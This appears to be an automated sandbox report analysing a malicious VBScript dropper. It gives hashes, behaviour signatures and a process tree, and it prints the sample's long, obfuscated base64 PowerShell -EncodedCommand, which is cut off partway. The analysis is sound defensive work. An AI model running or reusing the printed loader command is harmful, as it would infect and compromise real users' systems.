9629ddea649ce511246c959915ad102d25b3f616e4a4501bab4358895b38a913

General

Target

199436733-161137.vbs
Size

139KB
MD5

95c74f0df0282a10ba41f279741f39b0
SHA1

7dcf489ca3e3ba7325f3aa9f99aac908aa02c6d8
SHA256

9629ddea649ce511246c959915ad102d25b3f616e4a4501bab4358895b38a913
SHA512

c9e743d98767dfc476e56dcd6d0346e4e31c4853fed26670e72498a83eef39cda1c0debc2a50e6c27c9072ae910c0eeffda034c6f4b306537a2859983fc19e10
SSDEEP

3072:05ksEf25PvksR3zlbbjjPrCZYF81apKPya7cZ8ZN:Z2xLVnum81aAyoJ

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2040	powershell.exe
2040	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2040	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 4400 wrote to memory of 2040	4400	WScript.exe	87
PID 4400 wrote to memory of 2040	4400	WScript.exe	87
PID 4400 wrote to memory of 2040	4400	WScript.exe	87
PID 2040 wrote to memory of 3668	2040	powershell.exe	89
PID 2040 wrote to memory of 3668	2040	powershell.exe	89
PID 2040 wrote to memory of 3668	2040	powershell.exe	89
PID 3668 wrote to memory of 4252	3668	csc.exe	90
PID 3668 wrote to memory of 4252	3668	csc.exe	90
PID 3668 wrote to memory of 4252	3668	csc.exe	90

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\199436733-161137.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4400
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "JABHAGEAcwBsAGkAZwBoACAAPQAgAEAAJwANAAoARgByAG8AawBvAEEATABzAGsAZQBkAGQAUgBhAGQAaQBvAGQATABhAHoAZwBhAC0AVABhAG4AawBlAFQAVABhAHAAcgBlAHkAUwBjAGgAaQB6AHAASABlAHIAbQBhAGUASQBuAHQAZQBuACAAUgBlAGQAZQBsAC0AUgBlAHYAZQByAFQAQwBhAGIAaQBuAHkAUwBwAHUAbQBvAHAAQQBsAGwAbwByAGUARABkAHMAcwBwAEQAQQBrAHQAaQBlAGUAVQBuAHYAbwBjAGYAYQB1AGQAaQBlAGkATQBhAG4AbwBtAG4ATABlAHAAdABvAGkARgByAGkAdgBvAHQAVABpAGwAbABiAGkATQBvAHQAbwByAG8AUwBhAGQAZQBsAG4ARwB1AGwAcABlACAARABlAHMAZQByAEAAUgBlAGEAZABqACIACgBXAG8AcgBrAGwAdQBpAG4AZABvAGsAcwBNAGIAZQBsAHAAaQBTAHQAaQBsAGsAbgBTAHAAbwByAHQAZwBTAHQAYQByAHQAIABJAG4AbgBvAGMAUwBVAG4AYwB1AG0AeQBMAHkAbQBwAGgAcwBEAHIAaQBuAGsAdABDAGEAbAB5AGMAZQB0AGEAcgBhAHgAbQBzAGgAYQB3AHkAOwAKAEUAbABlAG0AZQB1AEYAaQBkAGUAbABzAEMAaABhAHMAdABpAEEAcgBiAGUAagBuAEgAbwBpAHMAZQBnAFQAeQByAGUAbgAgAE8AcgBpAGUAbgBTAGwAaQBuAGcAYgB5AEMAbwB1AG4AdABzAFMAdABhAGIAaQB0AEIAcgBvAGQAZQBlAE0AbwBkAGUAbABtAHMAcABvAG4AZwAuAFQAcgBpAHAAZQBSAEUAZwBlAG4AcwB1AEgAbwB2AGUAZABuAHMAZQBiAHUAbgB0AEMAYQBsAGwAbwBpAEIAbwB0AGEAbgBtAFQAbwBwAGEAegBlAFAAaQByAGEAdAAuAE8AdgBlAHIAZABJAFQAeQByAGsAZQBuAEMAYQBtAHMAZAB0AFMAdQByAHIAbwBlAFYAYQBsAG0AdQByAFAAbAB1AG0AZQBvAEIAYQByAGQAdQBwAE4AZwBsAGUAbwBTAEsAbwBvAHQAYwBlAHMAYQBsAGEAdAByAEsAbwBnAGUAZwB2AFoAZQBzAHQAZgBpAFYAbwBsAGMAYQBjAEwAYQB0AGkAcwBlAEwAawBrAGUAcgBzAFAAcgBlAGYAZQA7AAoASgBvAGsAZQBsAHAARQBmAHQAZQByAHUARwByAHUAbgBkAGIAVgBhAHIAZQBkAGwAQwBvAG0AbQBlAGkARABlAHIAcwBvAGMARQBzAHQAcgBhACAATQBpAGMAcgBvAHMAVQBkAGsAbwBiAHQAaAB1AG4AYwBoAGEAUwB5AG0AYgBpAHQATgBhAG0AZQB2AGkATQB1AHMAbABpAGMAUwBlAGwAZQBmACAAUgBhAGkAbgBiAGMAQgBvAHIAZABrAGwATQBhAHMAawBpAGEAQwBhAGMAbwB6AHMASgB1AGcAYQB0AHMARwBpAHQAYQBuACAASgByAGcAYQBzAE8ASwBsAGkAZQBuAHYATAB5AGQAcwBrAGUATgBpAHQAdABpAHIATABvAGcAaQBzADEACgBEAHIAaQBrAGYAewBuAGUAdABlAG8AWwBTAGwAdQBtAHMARABHAGUAbgBsAHMAbABFAHAAaQBjAGUAbABNAGkAcwBlAG4ASQBQAHIAYQBlAHMAbQBTAHkAbgBhAG4AcABCAHIAeQBnAGcAbwBLAHIAdQBkAHQAcgBwAHUAawBsAGUAdABEAHUAbwB0AHIAKABQAG4AZQB1AG0AIgBDAG8AcABwAGkAdwBUAGgAeQByAGUAaQBGAGEAcgB2AGYAbgBQAG8AbAB5AG0AcwBUAGEAZwBlAHQAcABGAHkAcgBzAHYAbwBTAHAAbwBpAGwAbwBCAG8AdQBjAGgAbABSAG8AdAB0AGUALgBWAGkAawB0AHUAZABBAGYAZwByAHMAcgBaAG8AbwBzAHAAdgBCAGwAbwBuAGQAIgBBAGsAdABpAGUAKQBQAGUAbgBnAGUAXQBJAG4AdABlAHIAcABLAGwAYQBtAG0AdQBCAGwAbwBvAGQAYgBNAGkAbgBpAHMAbABEAHkAZgBmAGUAaQBVAG4AZABnAGwAYwBBAG4AdABpAHAAIABTAGUAcgB2AGkAcwBXAGUAbABsAHEAdABBAGkAdgBlAHIAYQBUAG8AZQBuAGEAdABTAGgAbwBzAGgAaQBQAGwAYQBuAHQAYwBzAHUAawBrAGUAIABSAGUAZgBpAG4AZQBTAHQAZQB0AGUAeABhAG4AaQBjAHUAdABEAGEAbgBuAGUAZQBCAGkAbABzAGgAcgBRAHUAZQBlAG4AbgBEAHUAbQBtAGUAIABIAHkAcABvAHMAaQBWAG8AbABhAHQAbgBCAGUAZwBlAGoAdABIAHkAZAByAG8AIABTAHAAZQByAG0ARwBTAGkAZwBuAGEAZQBHAG8AZABzAHYAdABUAG8AbAB1AGUARgBKAHUAcwB0AGUAbwBQAHUAbABwAHcAcgBBAHAAcwBpAGQAbQBNAHkAdABoAG8AKABVAG4AZABlAHIAaQBTAG8AbABmAGEAbgBCAHUAcwBlAG4AdABEAGUAbABpAGsAIABhAHgAbwB0AG8AUwBEAGkAYQBrAG8AawBGAHIAZwBlAGgAcgBNAGkAbABpAGUAaQBBAG4AdABpAGoAdgBEAHUAcABsAGkAZQBQAGEAcgBrAGkALABBAHMAdAByAG8AaQBKAGUAbgBzAHkAbgBTAHQAZQBuAGgAdABOAHMAawBlAGQAIABLAHIAYQBrAGUAUwBNAG8AcgBkAHYAawBPAHgAeQBwAHIAbwBzAHUAYwBjAGUAbABLAG8AcgBlAHQAZQBDAG8AeQBzAHQAZABQAGEAcgB2AGUAMQBLAG8AcwBtAGUANwBKAGEAYwBxAHUANwBGAHIAaQBhAGIALABQAGEAaQByAHAAaQBOAHUAbABsAGUAbgBTAHQAcgBhAG4AdABDAG8AbgB0AGEAIABUAGkAbABlAG0ASwBBAGwAdABpAGMAYQBEAHYAcgBnAGsAcgBBAHQAdAByAGEALABSAGUAZgBvAGwAaQBPAHMAdABlAHIAbgBPAG0AZQBuAGkAdABGAG8AcgBzAHkAIABXAGUAcgBlAGMARQB0AHIAbwBkAHMAdABFAHAAbwBzAGUAcgBCAGEAcgBkAGUALABVAG4AZwB1AGkAaQBNAGUAZABpAGMAbgBHAG8AbABkAGYAdABEAGkAcwBjAGkAIABLAG8AbgB0AHIAVgBUAHkAcABvAG4AaQBIAHUAcgB0AGkAdABMAGEAZwBlAHIAYQBWAGQAZABlAGwAbQBVAGIAZQB0AHYALABEAGkAYQBiAGUAaQBKAG8AbABsAGkAbgBEAGkAcwBjAHIAdABNAGkAbABqAGEAIABQAG8AbAB5AGgAQgBSAHUAbgBkAGgAYQBLAGEAbABlAGkAZwBpAG4AdABvAHIAdABNAHUAbAB0AGkAYQBDAG8AbQBtAGUAbABLAHYAbwB0AGUAKQBCAGUAcwBrAHIAOwAKAFMAYwB1AGwAbABbAE4AbwBuAGEAcwBEAE8AcABsAHMAcwBsAEUAbgBjAGgAaQBsAFMAawBvAHYAbABJAEYAbwByAGgAaQBtAFQAcgBpAGsAbwBwAEIAbwByAHQAbwBvAEwAaQBuAGcAdQByAFQAaABhAGwAYQB0AFQAYQBuAGQAZQAoAFcAYQBtAGIAbAAiAEMAaABhAGUAdABzAEQAcgBhAGcAbwBoAEMAbwBtAHMAeQBlAFMAdQB0AHQAZQBsAEUAYQByAHQAaABsAEcAbAB5AGMAbwAzAGQAaQBzAGgAZQAyAFEAdQBhAGQAcgAuAFIAZQBpAGMAaABkAEEAZgB0AGUAbgBsAFUAbQBvAHIAYQBsAE0AYQB0AHIAaQAiAEIAYQBnAGgAYQApAE4AbwBuAGIAbwBdAEQAaQBwAGgAdABwAFIAbwBkAHIAaQB1AFAAaABvAHQAbwBiAFUAbgB0AHIAYQBsAEIAcgBvAG0AaQBpAEIAbwBlAHQAaABjAEIAaQBtAHAAbAAgAGQAbwBtAG8AcgBzAFMAbQBpAGQAZwB0AFIAZQBzAHQAYQBhAHAAYQBkAGwAZQB0AEIAbABlAGcAZgBpAFIAZQB0AHIAaQBjAEEAYwBvAHUAYwAgAEMAaABhAHIAbABlAEwAdQBuAHQAZQB4AEEAbAB1AG0AaQB0AEEAbgBnAGkAbgBlAFAAbABhAGkAYwByAEYAbwByAHQAeQBuAEQAbwBsAGwAYQAgAEYAbABsAGUAcwB2AE0AZQBsAGwAZQBvAFAAaQB0AGgAZQBpAGQAZQBnAGUAbgBkAEsAbgBrAGYAbAAgAEYAbwByAHMAawBTAHQAZQByAHIAbwBIAE0AbwBzAGUAaABGAEYAcgBhAGsAdAByAEYAbwByAHMAawBlAEkAbgB2AG8AbABlAFMAawBkAGUAcwBOAE8AYgBvAGwAdQBhAFMAaQBuAGcAbABtAFUAbgByAGEAbgBlAFUAZAByAGUAZwBNAG8AcABzAHAAYQBhAFQAcgBpAGcAbABwAEQAbwBnAG0AYQBwAEgAbwB2AGUAZABpAFIAYQB1AGsAbABuAEEAYwBoAGwAbwBnAFYAZQByAGQAZQBzAEsAcgBpAG0AbQAoAEEAbAB0AGkAbgBpAGcAYQBiAGYAZQBuAFMAdABpAGsAawB0AEkAbgBjAG8AbQAgAFQAaAB5AHMAYQBTAEQAcgBvAHMAawBvAEYAbABhAGcAZQBsAE8AdgBlAHIAZABpAFQAaQBsAHIAZQBkAFQAbwByAG4AZQBpAEwAYQBrAHIAaQAyAFQAaQBsAGsAbwA5AFMAdABlAG4AYgApAEUAdABoAG8AbAA7AAoAWAB5AGwAbwBmAFsATwB1AHQAcwBpAEQARABvAGsAdQBtAGwAZABhAG0AcABlAGwARQB2AGUAbgBoAEkASQBuAGQAcwBtAG0ARABhAHQAYQBzAHAAQwBvAG4AcwBjAG8AZwBlAG4AYgByAHIAVQBuAGQAZQByAHQAbgBlAHIAZABoACgATgBvAGsAawBlACIATQBvAG8AZABpAHUASQBuAHQAZQByAHMAQgBhAHIAZQByAGUATQBhAG4AZwBvAHIAQQBsAHAAYQBiADMAVABhAHAAcABlADIAUwBrAHIAbwB0ACIATQBhAHIAbQBvACkAQQBtAHQAcwB0AF0ATgBvAG4AYQBwAHAAUgB1AG4AZABzAHUAQQBnAHUAZABpAGIARgByAGEAZwBhAGwAVwBpAHMAaABiAGkARABlAHIAYwBvAGMASABlAGYAdABpACAAVQBzAHkAbgBsAHMAVQBwAHQAaQBlAHQAUwBvAGQAYQB2AGEAVABlAG4AZABvAHQATABpAGcAZQBkAGkARgBvAHIAcwBpAGMATQBpAG4AZABlACAASwBvAG4AdABvAGUAQgBsAG8AdwBmAHgAQQBuAHQAeQBkAHQAUABsAGEAdABvAGUARgBlAHIAbQBlAHIATABlAHcAbgBpAG4AUwBjAG8AbwB0ACAATQBpAHMAcABlAGkAQwByAGkAYgBiAG4AUgBlAGoAcwBlAHQATABhAG4AZwBzACAAQwBhAHIAYQBjAEMAbwBmAGYAZQByAHIAUAByAGUAYgBsAGUAUwBhAGEAcgBlAGEAUwB0AHkAcgB0AHQASAB5AGQAcgBvAGUARgBlAGIAZQByAEQAVABhAG4AZAB0AGkARgBvAHIAbABhAGEAUwBrAHIAdQBkAGwAUgBhAGQAaQBhAG8AQQBmAGYAYQBsAGcAYQBmAHYAaQBrAFAAUABhAHMAdABlAGEAYQBsAGIAdQBxAHIAYgBlAGEAbQBpAGEAVABpAHAAbABvAG0ASQBzAGEAbABsACgASABhAGwAdABlAGkARgBvAHIAdQByAG4AVQBuAHMAbgBhAHQAUABhAHIAdABzACAAYgBpAHIAawBlAEsATgBpAGcAaAB0AGkAUABvAGQAZQB2AGwAQgBhAHIAZABlACwAQwBoAHIAZQBzAGkAQgBvAHIAdABhAG4AcAByAGUAcwBzAHQAVQBuAHMAbABhACAAUwBrAHUAcgBrAEIAVABoAGkAYwBrAGwAQgBpAHMAdABhAGEAYQByAG0AZQBuAGIATgBhAHQAaQBvAGIAUwBrAGEAcgB2AGkAUAByAG8AcABhADEATQB1AHIAbQB1ADcAUgBhAGMAYwBvADUARgByAGUAcgBiACwAQgBvAHIAZwBlAGkASgBvAHMAaABpAG4AUABhAGMAaAB5AHQAUwBlAGwAZQBuACAARgBsAGkAZwBoAFQARAB5AGIAZABlAHYAUwBlAGwAZABvAGEAUgBpAHAAZQBsAG4ARABhAHQAYQBtACwASwBuAGUAYQBkAGkAUABhAHIAYQBwAG4ATQBvAHIAZABlAHQAZwBhAHMAbQBhACAATwBwAGkAbgBpAFYARgBvAHIAZQB2AGkASABvAG0AbwBnAGcASQByAHIAZQBtAGEAUgBlAGoAbwBsACwATQBhAHAAcABlAGkATgBvAG4AcwB1AG4ATQBhAHIAYwBpAHQAagBpAGcAZwBlACAAZQByAGkAbgBkAE0ARQBuAHMAcAByAG8AbQBpAHMAYQBuAG4AUAByAG8AYgBhACkATAB1AHIAaQBrADsACgBBAGMAYQByAGkAWwBFAGMAYgBvAGwARABEAGkAcwBpAG4AbABCAHkAZwBnAGUAbABTAGEAdQB0AGUASQBzAHQAaQBuAGsAbQBTAHQAaQBsAGwAcABCAG8AZwBzAGsAbwBQAGgAcgBhAGcAcgBCAGwAbwBkAHQAdABCAG8AcgBlAHUAKABSAGUAbABhAHgAIgBvAHYAZQByAGwAawBTAGYAbwByAGsAZQBBAGwAbQBzAGcAcgBJAG4AcwB0AHIAbgBIAG8AcgBuAHAAZQBTAGsAeQBkAGUAbABJAG4AaABlAHIAMwBCAHUAZwB0AGgAMgBTAHUAaQBzAHQAIgBBAG4AawBvAG0AKQBTAG8AdQBrAHAAXQBTAGUAcAB0AGUAcABVAHIAbwB2AGEAdQBJAG0AcAByAGEAYgBMAGEAbgBnAHMAbABGAHIAdQBtAHAAaQBSAGUAYgBvAHUAYwBEAGEAdABhAGUAIABUAGUAbwByAGkAcwBBAGwAbABvAHQAdABTAHUAYgBjAHUAYQBPAHYAdQBsAGkAdABPAHIAZABrAGwAaQBzAHAAaQBmAGwAYwBTAGEAbQBsAGUAIABTAGEAbABnAHMAZQBGAGUAbABkAGkAeABCAGEAawBrAGUAdABBAG4AdABpAHEAZQBTAHUAYgBvAGIAcgBMAGUAZwBlAG4AbgBiAHIAbwBkAGUAIABUAGEAbgBpAHMAdgBHAGkAdgBpAG4AbwBDAGkAdgBpAGUAaQBEAGkAbwBsAGUAZABFAGMAaABlAHYAIABTAHAAaQBzAGUARwBUAG8AbAB1AGUAZQBVAG4AcwBsAGUAdAB0AHkAcABlAHMAUwBNAGEAbgBvAG0AdABEAGkAcwByAGUAYQBCAGkAbABsAGkAcgBUAHIAbwBwAG8AdABPAHAAZwBhAG4AdQBIAHUAbgBkAHIAcABCAGUAbgB6AG8ASQBNAGkAZABzAHQAbgBzAGwAaQBiAGIAZgBGAGoAZQByAG4AbwBQAHMAZQB1AGQAKABUAG8AbQBtAGUAaQBBAG4AdABlAG4AbgBUAHMAZQBhAGcAdABVAGQAYgB1AGQAIABzAGUAawB0AGUAVABLAG4AZQBiAGUAYQBCAHUAZABnAGUAcgBtAGkAbgBkAHIAbQBJAGQAbwBsAG8AMQBGAHIAcABlAHIAMQBTAGEAawByAG8ANABBAGQAcgBlAG4AKQBLAG8AZABuAGkAOwAKAEUAcgBvAGIAcgBbAFcAaABlAHIAZQBEAFMAYQBuAGkAdABsAEsAaQBuAGQAbABsAFMAawBhAGsAdABJAG4AZQB3AHMAYQBtAFkAdAB0AHIAaQBwAFYAZQBqAGEAcgBvAEIAZQBmAHIAeQByAFMAdAB5AHAAcwB0AEUAagBsAGUAcgAoAE0AbwBpAHIAZAAiAE4AYQByAGMAbwB1AFMAbAB1AGIAYgBzAGYAbABpAHIAdABlAE0AYQBzAGsAaQByAEIAYQBnAHMAbQAzAFIAYQBhAGQAcwAyAE0AYQBuAGYAdQAiAEcAYQBuAGEAbQApAFYAZQBqAGsAcgBdAE0AZQB0AGUAbgBwAFIAZQBkAGkAZwB1AE0AZQByAHIAZQBiAGYAbwBuAGUAdgBsAEIAbABvAGQAYQBpAEEAbgBtAGUAbABjAFYAaQBsAGoAZQAgAE4AYQB0AHQAZQBzAFIAZQBwAHUAYgB0AE8AdgBlAHIAYgBhAHMAZQBrAHMAdAB0AFUAbgBkAGUAcgBpAEUAZwBhAGQAcwBjAFIAZQBzAHAAaQAgAE0AYQBuAGsAbwBlAFUAbgB3AGkAbgB4AEsAYQBsAGsAawB0AEEAcwBzAGkAbQBlAE8AcgBhAHIAaQByAEIAbwB5AGEAcgBuAHUAbgBhAGcAZwAgAEYAbwBsAGsAZQBpAE0AYQBjAHIAbwBuAEYAbABvAGsAaQB0AFMAbwBsAHMAawAgAEIAaQB6AGEAcgBDAFUAbgBuAGkAdAByAEUAdgBlAGwAeQBlAE8AYgB0AGUAbgBhAEIAbwByAGQAdgB0AGcAYQBzAHIAYQBlAEIAaQBmAGEAbABJAEEAYgBvAG4AbgBjAEQAbwBsAGkAYwBvAEEAbABvAGMAaABuAFMAbgBhAGsAcwBJAFAAcgBhAGsAdABuAEQAaQBzAHQAcgBkAFYAZQBqAHAAbABpAEkAbgBmAHIAYQByAHMAawB1AG4AawBlAE4AaQBoAGkAbABjAEgAeQBwAG8AdAB0AFQAbwBuAG4AaQAoAEQAdQBsAGMAaQBpAEkAcwBzAHUAZQBuAFQAcgBhAGcAZQB0AEEAcgBnAG8AdgAgAFUAbgBpAG4AcwBEAEsAYQBuAHUAdABhAG8AcgBuAGEAbQByAEYAcgBlAGQAbgBrAEcAbwB1AHIAbQAxAFMAbwB1AG4AZAA2AEIAdQB0AGMAaAA3AEUAeAB0AHIAYQApAEwAbwBiAG8AbAA7AAoATgBhAHQAaQBvAFsAVABlAGsAcwB0AEQAUABhAHIAYQBsAGwAUwB0AGkAYwBrAGwAQwBsAHkAcABlAEkAYwBoAGEAZQB0AG0AUgBhAHAAbgBkAHAAVgB1AGcAZwBlAG8ASgB1AHMAdABsAHIARwBvAHUAZAB5AHQARgBlAGQAdABlACgAYgBlAHQAeQBuACIAVAByAGEAYwBoAHUARABlAHQAcgB1AHMAVQBuAGIAcgBlAGUAVQByAGkAbgBvAHIARABqAHYAbABlADMARABpAHMAdABhADIAUwB1AHAAZQByACIASwBvAGwAbABlACkATABlAGQAZQBsAF0ASABlAGwAbABpAHAAUgBvAHQAdABlAHUATQBhAGgAbwBnAGIAUwBrAGEAZQByAGwARABpAHMAZgBhAGkAQgBqAGUAcgBnAGMAVgBlAHIAbQB1ACAAVABoAHUAbgBkAHMAWgB5AGcAbwBtAHQARgBhAGMAcgBkAGEAcABhAHIAbgBhAHQAVQBkAHMAeQByAGkASQBuAHQAcgBlAGMAQgBzAHMAZQBrACAAUwBpAGQAZQByAGUATwB2AGUAcgBlAHgAQgBpAHMAbQBlAHQASwBhAHIAdABlAGUAQQBnAGkAdABlAHIAUwBsAGkAawBwAG4AQQBmAGcAaABhACAAUAByAG0AaQBzAGkATQBlAGQAcABsAG4AUAByAGUAcwBwAHQATQBhAHIAcwBrACAAUABsAGUAbgBzAEcATQBhAHYAZQBkAGUAVgBhAHMAaQBsAHQAVABhAG0AZQByAEQAVQBkAGcAYQB2AGwASgBhAGcAcwBjAGcASABpAGUAbABhAEkAUwBrAGkAYgBzAHQAVABlAG4AZABlAGUAUgBlAHAAZQByAG0ASABhAGEAbgBkAEkAVAByAHkAZwBnAG4ASQBuAGcAYgBlAHQARwByAGEAYQBuACgAQQBmAGwAaQByAGkARwB1AG4AcwBtAG4AQQBuAG4AZQBtAHQATAB1AGYAZgBhACAAUwB5AHYAcwB0AEQARgBvAHIAdQByAGkAUABzAGUAdQBkAG4ARwByAHUAbgB0AG8AbwBtAHYAdQByAHMAcABsAGEAeQBsACwARABlAGMAaQBtAGkAQQBmAHMAZQBuAG4AUwB0AGUAbgB0AHQARQBmAHQAZQByACAATgBlAG0AYQB0AFMAVQBuAHMAaQBtAHYAUwBtAGEAYQBmAGkAUwBpAGwAdgBlAGcATQB5AG8AcwB5AGUAVQBuAHMAbwBwAHIAUwB1AGIAbwByACwATABhAGUAcwBlAGkAVQBkAHAAbgBzAG4AVgBpAHIAYQBzAHQAUwBvAGwAZwB1ACAAcwB0AHYAaAB0AEEARABpAGEAZwByAHQASwBvAGQAZQBzAGgARwBhAHUAZABpAGwAUwB5AG4AbwBuACwAVgBpAGQAdQBuAGkAUwBlAGsAdQBuAG4AQQByAG4AdQBzAHQARABlAG4AcwBpACAASQBuAHQAZQByAFIATABlAHAAaQBkAG8ARAB5AHIAZQB0AGsAVAByAGkAbABsAGsASABpAGQAaAByAGUAWgBvAG8AZgB5AHIARgBvAHUAbABzACkASABqAGUAcgB0ADsACgBCAGkAZgBhAGwAWwBCAGEAbgBnAGsARABBAHMAdwBpAG0AbABJAG4AdABlAHIAbABUAGkAbgBkAGkASQBDAGEAZgBmAGUAbQBiAGEAbAB0AGUAcABMAGUAbgBpAGUAbwBXAG8AbABmAHIAcgBTAHQAbgBrAHMAdABEAGUAYgBvAHIAKABPAHUAdABjAHIAIgBNAGEAdABlAHIAdQBSAGkAZABlAGIAcwBrAGwAaQBzAHQAZQBDAGUAbgB0AGkAcgBWAGEAcgBtAGUAMwBGAGwAbwB0AHMAMgBCAGUAbgBiAHUAIgBLAGEAcwBzAGEAKQBCAGkAdABpAG4AXQBEAG8AawB1AG0AcABCAHIAbwBwAGUAdQBQAHIAZQBiAGUAYgBMAG8AdgBvAHYAbABDAGEAbQBvAHUAaQBSAGUAZwBpAG8AYwBFAG4AagBvAGkAIABTAGkAbQB1AGwAcwBBAGYAbQBpAGwAdABGAGwAdQBvAHIAYQBMAHMAcgBpAHYAdABLAGwAdQBuAHQAaQBWAGkAawB0AHUAYwBTAHQAaQBnAGUAIABVAGQAbABpAHMAZQBIAGUAbQBtAGUAeABUAGUAbABlAHgAdABQAHIAaQBtAHMAZQBJAHMAZABlAHMAcgBJAG0AcABsAGEAbgBCAGEAZwBsAGEAIABWAGEAYQBnAGUAaQBUAGEAcgB0AGUAbgBDAGUAbQBlAG4AdABNAGUAdABhAGcAIABVAGIAZQBzAGsASQBDAGgAcgBvAG0AcwBrAGUAeQBwAHIAWgB0AGkAbgBlAGEAbwBIAGEAYQBuAGQAbwBJAG4AZABsAGcAbQBQAHIAbwBwAG8AZQB0AHIAZQBtAHUAZABOAG8AbgBhAHAAKABGAGkAbAB0AGUAaQBQAG8AYwBrAG0AbgBwAHIAYQBnAHQAdABQAGwAZQBiAGUAIABBAHAAcwBpAHMARABJAG4AdgBlAG4AYQBHAHIAZQBuAGUAZABTAGsAYQBsAGEAKQBMAGkAdgBzAG0AOwAKAFQAbwBtAGgAZQBbAHMAbwBwAGgAaQBEAEEAbgBlAHAAaQBsAEEAYwBhAHIAbwBsAEMAbwBuAHQAYQBJAFAAcgBvAHMAaQBtAEIAZQBmAHIAdQBwAFMAYwBlAG4AZQBvAEEAcgBjAGEAZAByAFAAcgBpAG0AdQB0AFAAaABpAGwAbwAoAE0AYQBsAGUAcwAiAEcAcgB1AHAAcABrAEIAcgBlAHYAcABlAEEAbQBiAGkAdAByAE8AcABmAGEAdABuAFIAZQBkAG4AaQBlAEYAcgBlAGsAdgBsAFMAdABlAGoAbAAzAEgAeQBkAHIAbwAyAEYAbABlAHIAdAAiAHUAbgBlAG0AZQApAEsAbwBuAHQAbwBdAEQAaQBwAGwAbwBwAFIAZQBsAGUAdgB1AEwAbwBiAHMAYwBiAFMAdAB2AGIAbwBsAFQAaQBsAHMAdABpAFMAawB1AG0AcgBjAFUAbgB0AGkAbAAgAFAAbABhAHMAbQBzAFYAYQByAGkAZgB0AEYAcgBhAHMAbwBhAEIAYQBnAGwAbwB0AE0AYQBsAHQAYQBpAFIAbwBxAHUAZQBjAEEAbgBkAGEAbAAgAEwAdQBkAGUAZABlAEsAbABhAHQAdAB4AEwAYQBrAHIAaQB0AFMAdABhAHIAdABlAHUAbgBoAGUAcgByAEQAZQBmAG0AcgBuAEwAYQBuAGQAcwAgAFQAZQBhAHIAYQBpAEQAYQB0AGEAZgBuAE0AYQByAGcAYQB0AEkAbgBkAGUAcgAgAEQAZQBjAGUAbgBWAFMAcABvAG4AcwBpAEYAcgBlAG0AcwByAFMAaQBuAGsAcwB0AEUAawBzAG8AdAB1AEYAbwByAHMAawBhAFMAdQBiAG0AZQBsAEYAcgBhAHQAcgBBAEYAbwBvAGwAaABsAFYAYQBjAGMAaQBsAEMAbwByAGsAcwBvAFQAaABlAG8AbQBjAHMAdgBhAGoAbgAoAFAAZQBwAGUAcgBpAEIAZQBzAHQAaQBuAEIAYQBuAGsAcAB0AFQAcgBvAHMAZgAgAEIAYQBnAGcAcgB2AEkAbgBkAGUAdAAxAFQAagBlAG4AZQAsAFMAaQBnAG4AYQBpAFIAbwBtAGEAbgBuAE0AdQBsAHQAaQB0AFYAYQBlAHIAZQAgAEYAaQBzAHMAZQB2AEEAZwBpAHQAYQAyAEgAYQB1AGwAYQAsAGEAYwByAG8AdABpAE0AaQBzAHIAZwBuAFIAdQBuAG4AaQB0AEwAZQB0AG0AZQAgAEEAZwB0AGUAcgB2AFAAaQBzAHQAYQAzAE0AYQBzAGsAZQAsAEEAYQBsAG4AZABpAFYAbwBsAGQAdABuAE4AbwBuAGQAaQB0AEsAbwBuAGYAZQAgAEsAZABiAGoAZQB2AFIAZQBuAHQAZQA0AEkAbgB0AGUAcgApAE0AYQBuAGgAYQA7AAoATABlAGoAcgBzAFsAUwBlAHAAdABlAEQAVAB1AGYAZgBjAGwAUAB1AG4AYwB0AGwASAB5AGQAcgBhAEkAUAByAGEAeABpAG0ASwBvAHIAdQBuAHAAUAB1AHAAaQBsAG8AWABhAG4AdABoAHIAQQBsAHAAaABlAHQAUwB5AG4AawByACgAQwBvAGQAZgBpACIAUwBtAGEAbABmAGsATwBwAHQAcgB5AGUASgBlAHIAbwBuAHIAVAByAGkAYwByAG4AUwBrAHIAYQBiAGUAUwBjAGEAZwBsAGwATwBtAG0AZQBzADMAQgBhAG4AZABzADIASABlAGwAaQBwACIASAB5AHAAZQByACkAUwB0AGEAbgBsAF0ASQBtAHAAYQBnAHAATABhAG4AYwBlAHUAQQBtAGEAZwBlAGIAdgBlAGQAawBlAGwARgBvAHIAZAByAGkAZQB1AHIAaABvAGMASgB1AHMAdABpACAARgBvAHIAbQBhAHMAUwB1AGIAYwBlAHQATwBrAHQAYQB2AGEAVABpAGQAcwBzAHQAUAByAGUAYQBzAGkAUwBlAG0AaQBkAGMAQgBhAGMAawBjACAAbQBhAHIAbABvAGUAQgBpAGQAcgBhAHgAVQBmAG8AcgBuAHQAQwBhAHAAZQBsAGUASQBuAGoAdQByAHIAUwBrAHUAbABsAG4AUwB1AHAAZQByACAAQQBmAHIAaQBnAEkAVAByAGEAcABlAG4AQQByAG0AYgByAHQATgBzAHQAYgBlAFAARgBvAHIAcwB2AHQAYQBmAGgAcwB0AHIAUwBhAG0AbQBlACAAUAByAG8AbQB1AEUAVABvAGwAcwBlAG4ARwBhAHkAbgBlAHUARgB1AG4AZABoAG0ASgBvAHUAcgBuAFMAQQB0AG8AbQB0AHkAQgBvAHMAZQBsAHMAUwBpAGIAYgBlAHQARgBhAGkAcgBmAGUAUwBuAGEAawBlAG0AVABlAGsAcwB0AEwARgB1AGwAZAB0AG8ARgBvAHIAcwBvAGMARgBvAHIAbgB5AGEARgBvAHIAYgBlAGwAQQBmAGIAcgB5AGUAQgBpAGIAbABpAHMATgBhAGEAZABlAEEAVQBkAHQAcgBhACgATgBvAG4AZgBvAHUAQwBhAHAAaQB0AGkAUwB1AG4AZABoAG4ARw